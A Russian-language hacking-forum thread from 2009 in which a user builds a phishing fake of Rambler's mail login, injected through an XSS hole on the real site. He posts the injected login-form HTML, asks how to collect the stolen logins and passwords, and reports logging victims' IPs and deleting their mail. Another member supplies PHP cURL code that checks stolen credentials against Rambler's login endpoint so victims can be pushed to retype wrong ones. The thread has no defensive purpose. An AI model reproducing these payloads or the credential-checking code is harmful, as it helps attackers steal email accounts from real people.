Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Вопрос по поводу xss + фейк. (https://forum.antichat.xyz/showthread.php?t=111485)

anton15 16.03.2009 22:16
Вопрос по поводу xss + фейк.
 
Подскажите пожалуйста. Замучался искать примеры - пару часов ищу по всему яндексу.

Раньше я использовал команду POST при передачи и записи файлов из обычного фейка в файл.

Сейчас я нашёл xss на рамблере - сделал всё правильно, т.е. вставил в эту xss фейк рамблера. И тут встретилась команда GET. Вопрос такой: какой код команды GET в принимающем файле от xss с js-ява скриптом надо прописать в принимающем файле для приёма логина и пароля. Хоть приблизительно накиньте - а там я доделаю. Замучался искать просто.

Zitt 16.03.2009 22:21
исправь у себя $_POST на $_GET =)

anton15 16.03.2009 22:22
Исправил - не помогает. Уже всё перепробовал.

Сам скрипт ява имеет такой вид:

PHP код:
<form method="get" action="'+getaction+'" name="auth_form"><input type="hidden" name="from" value=""><input type="hidden" name="back" value="http://mail.rambler.ru/mail/startpage"><input type="hidden" name="url" value=""><table cellpadding="5" cellspacing="0" border="0" width="100%"><tr valign="top"><td class="txt" align="left" width="22%"><label for="login">Ваше имя на Рамблере (логин):</label></td><td width="230"><table cellpadding="0" cellspacing="0" border="0" width="230" <tr><td width="100%"><input type="text" name="Login" id="login" value="" size="10" maxlength="129" tabindex="1" style="width: 100%;"></td><td valign="top">&nbsp;<span class="txt">@rambler.ru</span></td></tr></table></td><td rowspan="3" width="5%"></td><td rowspan="2" align="left"><div class="ttl_small">Нет имени?</div><div class="txt"><a ref="http://id.rambler.ru/script/newuser.cgi?back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage">Выберите имя 

mailbrush 16.03.2009 22:55
Должен работать, если все правильно изменил.

anton15 16.03.2009 22:59
Записываются, но только две точки... логина и пароля нет. Переменные вроде бы правильные: Login и passw - в скрипте такие же... Когда то было такое, причиной были переменные и их названия, но сейчас они правильные... тогда почему точки?

anton15 16.03.2009 23:14
Есть где-нибудь фейк такого же типа через xss на примере, хоть старый трёхлетней давности с закрытой xss на одном из емайл сервисов? если есть скиньте пожалуйста ссылочку. Я посмотрю и на примере сделаю.

anton15 17.03.2009 01:14
Тема закрыта. Спасибо Всем за внимание. :) Сейчас сяду, часков пять голову поломаю и заработает, а куда она ещё денется :)

anton15 21.03.2009 00:20
Сделал данную вещь, всё записывается, также прописал, чтобы записывался ip, дата, и удаление письма если надо.

У меня возник опять вопросик:

Нужно сделать так, чтобы фейк был и проверял данные по правильности и на валидность (с проверкой на валидность вводимых паролей) - т.е. человек заходит на форму фейка, далее вводит пароль - если он ввёл пароль не правильно, то его перебрасывает на страницу, которую я укажу с предупреждением: пароль введён не верно; а если он ввёл правильно, то перебрасывает на страницу, которую я укажу - с указанием, спасибо, всё введено правильно.

Может кто-нибудь дать пример? как это всё сделать - может есть у кого-нибудь пример данного скрипта? Мне бы примерчик, а там я додумаю.

.:EnoT:. 21.03.2009 01:39
Да принцип простой. Отправляешь полученные данные на рамблер и смотришь.

PHP код:
<?php

$login 'qwerty';
$password '12345';

$postdata 'back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage&login=' $login '&passw=' $password;

$cl curl_init('http://id.rambler.ru/script/auth.cgi');
curl_setopt($clCURLOPT_RETURNTRANSFER1);
curl_setopt($clCURLOPT_POST1);
curl_setopt($clCURLOPT_POSTFIELDS$postdata);
$result curl_exec($cl);
curl_close($cl);

?>
Далее в ответе ищешь совпадение на фразу "Неправильный логин или пароль". Если присутствует, заставляй логиниться ещё раз.

anton15 21.03.2009 01:56
Всё понял приблизительно - дальше додумаю...

когда пять часиков голову поломаю... :)

Всем большое спасибо за внимание к моей теме - всем очень благодарен. Всех благодарю.

Тема закрыта, модератор можешь тему удалять, а можешь оставить.

Всем Доброго времени суток.


Время: 16:45